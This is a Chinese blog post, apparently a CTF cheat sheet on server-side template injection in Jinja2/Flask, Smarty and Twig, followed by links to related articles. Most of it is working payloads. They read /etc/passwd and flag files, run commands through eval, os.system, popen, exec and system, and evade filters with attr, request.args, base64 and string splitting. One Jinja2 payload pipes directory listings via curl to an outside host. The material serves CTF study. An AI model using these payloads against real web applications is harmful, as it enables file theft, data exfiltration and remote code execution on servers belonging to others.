php沙盒绕过ctf,CTF SSTI(服务器模板注入)

最新推荐文章于 2024-04-20 02:43:25 发布
最新推荐文章于 2024-04-20 02:43:25 发布
阅读量771 收藏 1
点赞数 1
文章标签: php沙盒绕过ctf

基本判断

7c5a7e0c30c26bb52a7c8f00a4e2e68a.png

渲染模板

flask/jinja

flask SSTI的基本思路就是利用python中的魔术方法找到自己要用的函数

__dict__ 保存类实例或对象实例的属性变量键值对字典

__class__ 返回类型所属的对象

__mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。

__bases__ 返回该对象所继承的基类

// __base__和__mro__都是用来寻找基类的

__subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表

__init__ 类的初始化方法

__globals__ 对包含函数全局变量的字典的引用

一些姿势

1、config

{{config}}可以获取当前设置,如果题目类似app.config ['FLAG'] = os.environ.pop('FLAG'),那可以直接访问{{config['FLAG']}}或者{{config.FLAG}}得到flag

2、self

{{self}} ⇒

{{self.__dict__._TemplateReference__context.config}} ⇒ 同样可以找到config

3、""、[]、()等数据结构

主要目的是配合__class__.__mro__[2]这样找到object类 {{[].__class__.__base__.__subclasses__()[68].__init__.__globals__['os'].__dict__.environ['FLAG']}}

4、url_for, g, request, namespace, lipsum, range, session, dict, get_flashed_messages, cycler, joiner, config等

如果config,self不能使用,要获取配置信息,就必须从它的上部全局变量(访问配置current_app等)。

例如:

{{url_for.__globals__['current_app'].config.FLAG}}

{{get_flashed_messages.__globals__['current_app'].config.FLAG}}

{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}

常用绕过

以下表示法可用于访问对象的属性:

request.__class__

request["__class__"]

request|attr("__class__")

可以使用以下方法访问数组元素:

array[0]

array.pop(0)

array.__getitem__(2)

(1)过滤[]和.

只过滤[]

pop() 函数用于移除列表中的一个元素(默认最后一个元素),并且返回该元素的值。 ''.__class__.__mro__.__getitem__(2).__subclasses__().pop(40)('/etc/passwd').read() 若.也被过滤,使用原生JinJa2函数|attr() 将request.__class__改成request|attr("__class__")

(2)过滤_

利用request.args属性 {{ ''[request.args.class][request.args.mro][2][request.args.subclasses]()[40]('/etc/passwd').read() }}&class=__class__&mro=__mro__&subclasses=__subclasses__ 将其中的request.args改为request.values则利用post的方式进行传参

(3)关键字过滤

base64编码绕过 __getattribute__使用实例访问属性时,调用该方法

例如被过滤掉__class__关键词 {{[].__getattribute__('X19jbGFzc19f'.decode('base64')).__base__.__subclasses__()[40]("/etc/passwd").read()}}

字符串拼接绕过 {{[].__getattribute__('__c'+'lass__').__base__.__subclasses__()[40]("/etc/passwd").read()}} {{[].__getattribute__(['__c','lass__']|join).__base__.__subclasses__()[40]}}

(4)过滤{{

使用{% if ... %}1{% endif %},例如

{% if ''.__class__.__mro__[2].__subclasses__()[59].__init__.func_globals.linecache.os.popen('curl http://http.bin.buuoj.cn/1inhq4f1 -d `ls / | grep flag`;') %}1{% endif %}

如果不能执行命令,读取文件可以利用盲注的方法逐位将内容爆出来

{% if ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/test').read()[0:1]=='p' %}1{% endif %}

payload

python2

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}

{{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

{{().__class__.__bases__[0].__subclasses__()[59].__init__.__globals__.__builtins__['eval']("__import__('os').system('whoami')")}}

python3

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}

Smarty

1、{php}{/php}

Smarty已经废弃{php}标签,强烈建议不要使用。在Smarty 3.1,{php}仅在SmartyBC中可用

2、{literal}

{literal}可以让一个模板区域的字符原样输出。这经常用于保护页面上的Javascript或css样式表,避免因为Smarty的定界符而错被解析。

那么对于php5的环境我们就可以使用

3、{if}

Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}. 全部的PHP条件表达式和函数都可以在if内使用,如*||*,or,&&,and,is_array(), 等等

{if phpinfo()}{/if}

4、getStreamVariable

新版本失效 {self::getStreamVariable("file:///etc/passwd")}

twig

文件读取

{{'/etc/passwd'|file_excerpt(1,30)}}

{{app.request.files.get(1).__construct('/etc/passwd','')}}

{{app.request.files.get(1).openFile.fread(99)}}

rce

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}

{{['cat /etc/passwd']|filter('system')}}

POST /subscribe?0=cat+/etc/passwd HTTP/1.1

{{app.request.query.filter(0,0,1024,{'options':'system'})}}

参考链接

酣胆书生
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 1577
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
PHP代码审计之SSTI模板注入
qq_22132931的博客
12-08 674
PHP代码审计之SSTI模板注入
[CTF的PASSBY]浅谈FLASK-jinja2 SSTI绕过
qq_64201116的博客
07-04 2234
我目前了解的后端的三大语言,基于php,基于java,基于python,这篇文章就来浅浅谈谈关于python构造的flask过滤SSTI不严谨导致的SSTI注入
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
最新发布
2401_84009698的博客
04-20 947
外链图片转存中…(img-6fV9ce6x-1713552193682)]
SSTI注入————phpSSTI
wwwwyyyrre的博客
06-04 920
SSTI和SQL注入原理差不多,都是因为对输入的字符串控制不足,把输入的字符串当成命令执行。SSTI利用的是现在的网站模板引擎,主要针对python、php、java的一些网站处理框架SSTI漏洞大致可以分为三种类型————python中的ssti java中的ssti php中的ssti这里不细致介绍模板之类的内容 提供关于ssti注入的题 在题中理解 涉及的内容较多 这里提供一个大佬讲解的ssti的详细内容。
[ctf web]SSTI PHP模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3324
PHP模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问题 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
模板注入与_FLASK.pdf
08-08
本次议题结合Flask框架及其使用的Jinja2模板,讲解了模板注入的原理、注入手段和一些绕过方式,以及结合Python沙盒逃逸思路的一些攻击手段,最后针对模板注入漏洞的发现及防御进行了一些讨论。 模板注入基本成因 ...
tplmap:服务器模板注入和代码注入检测与开发工具
05-03
Tplmap通过许多沙箱转义技术来帮助利用代码注入服务器模板注入漏洞来访问底层操作系统。 开发该工具及其测试套件是为了研究SSTI漏洞类别,并在Web应用程序渗透测试期间用作攻击性安全工具。 沙盒突破技术来自...
沙盒模板
02-14
sql沙箱 ... 该应用程序旨在快速设置迷你应用程序以进行练习和原型制作 要使用该应用程序,您需要执行以下操作: ...运行“ npm start”以使用nodemon启动服务器,该服务器将在任何服务器端代码更改后自动刷新
万能脱壳工具 - 一款在沙盒中运行的脱壳工具
01-27
万能脱壳工具是一款自带虚拟机的脱壳工具,这款软件可以用于解包恶意程序进程深度分析,软件自带了虚拟机,就像是在沙盒中运行一样,不会对你的系统产生损害。如果你对系统的安全意识非常高,想要解包恶意程序的时候...
sandboxes-api-php-client:沙盒APIPHP客户端
02-25
Keboola提供的Sandboxes API PHP客户端 安装 库可作为作曲家软件包使用。 要在项目中开始使用作曲家,请按照以下步骤操作: 安装作曲家 curl -s http://getcomposer.org/installer | php mv ./composer.phar ~ /...
tpl.func.php,SSTI(模板注入) - osc_vylqfbau的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39618730的博客
03-10 119
SSTI简介何为模板引擎(SST)百度百科:模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。个人理解就是:一个html页面中没有实际内容,但是有变量,访问这个页面时需要将这个变量转换成预期的内容,这时候就需要用到模板引擎。php(或者其他脚本语言)代码通过访问模板引擎,模板引擎通...
php 沙箱逃逸,浅析Python SSTI/沙盒逃逸
weixin_39535283的博客
03-28 540
前言之前也接触过什么是SSTI,但大多以题目进行了解,很多模块以及payload都不了解其意就直接拿过来用,感觉并没有学到什么东西,最主要的是在绕过的过程中,不清楚原理没有办法构造,这次就好好来学习一下原理以及姿势一、基础知识0x00:沙盒逃逸沙箱逃逸,就是在一个代码执行环境下(Oj或使用socat生成的交互式终端),脱离种种过滤和限制,最终成功拿到shell权限的过程0x01:python的内建...
php沙盒绕过ctf,浅析SSTI(python沙盒绕过)
weixin_39583162的博客
04-09 875
CTF比赛中见过不少的SSTI题目,在这里整理下思路,记录下0x01 简介SSTI(Server-Side Template Injection),即服务端模板注入攻击,通过与服务端模板的输入输出交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的,目前CTF常见的SSTI题中,大部分是考python的0x02 攻击流程攻击流程,以文件读取为例子函数解析__c...
SSTI模板注入绕过姿势(基于Python-Jinja2)
热门推荐
Y4tacker的博客
08-02 1万+
http://xmctf.top:8962/?name={{%22%22[%22\x5f\x5fclass\x5f\x5f%22]["\x5F\x5Fbase\x5F\x5F"]["\x5F\x5Fsubclasses\x5F\x5F"]()[233]["\x5F\x5Finit\x5F\x5F"]["\x5F\x5Fglobals\x5F\x5F"]["\x5F\x5Fbuiltins\x5F\x5F"]['eval']("\x5F\x5Fimport\x5F\x5F('os'))")}}
[G1CTF2021]ssti
m0_47940466的博客
05-23 124
在括号内输入9*9可得结果 81 模板注入可参考 https://blog.csdn.net/xia739635297/article/details/104229582 {% for c in [].__class__.__base__.__subclasses__() %} {%if%20c.__name__=='catch_warnings'%27'%} {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('l
关于SSTI模板注入漏洞利用工具开发
全栈胖叔叔
05-08 749
因为参加CTF比赛,随手写了一个通用的SSTI模板注入工具,可以用于执行脚本和基本命令。演示地址为测试靶机地址。 上图中已经把文件目录结构爆出来了,读文本文件直接爆出Flag …
SSTI(模块注入)的简单学习
dbabs的博客
02-05 651
SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。
SSTI 学习笔记
m0_63253040的博客
03-13 3296
PHP SSTI(Twig) 学习文章 进入环境,左上角有flag,hint 都检查看看 flag页面显示ip,hint页面源代码有提示 考虑XFF头或者referer头 测试一下 注:这里不用加上“;” 出来了 python flask ssti 学习文章 原理:因为对输入的字符串控制不足,把输入的字符串当成命令执行。 漏洞产生主要原因:render_template渲染函数的问题 渲染函数在渲染的时候,往往对用户输入的变量不做渲染,..
redis lua沙盒绕过
08-14
根引用和引用,在Debian和Ubuntu的Redis发行版中,由于在Lua沙箱中遗留了一个对象package,攻击者可以利用该对象的方法加载动态链接库liblua里的函数,从而逃逸沙箱执行任意命令。但要利用这个漏洞,攻击者需要具有执行eval命令的权限,即攻击者经过认证或Redis本身未设置鉴权检查。 另外,根据引用,一些发行版本(如Ubuntu、Debian和CentOS)会在原始软件的基础上打补丁,其中有一个针对Redis的补丁。该补丁在lua_libs_debian.c中增加了一个include语句,并使用make生成补丁包。 综上所述,Redis Lua沙盒绕过漏洞存在于Debian和Ubuntu的Redis发行版中,攻击者可以利用这个漏洞来执行任意命令,前提是攻击者具有执行eval命令的权限,并且Redis未设置鉴权检查。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [Redis Lua沙盒绕过命令执行(CVE-2022-0543)](https://blog.csdn.net/weixin_45495060/article/details/123692356)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [【CVE-2022-0543】Redis Lua沙盒绕过命令执行复现](https://blog.csdn.net/weixin_45329947/article/details/123531319)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [简单漏洞:CVE-2022-0543 Redis Lua 沙盒绕过](https://blog.csdn.net/qq_74447851/article/details/128791134)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值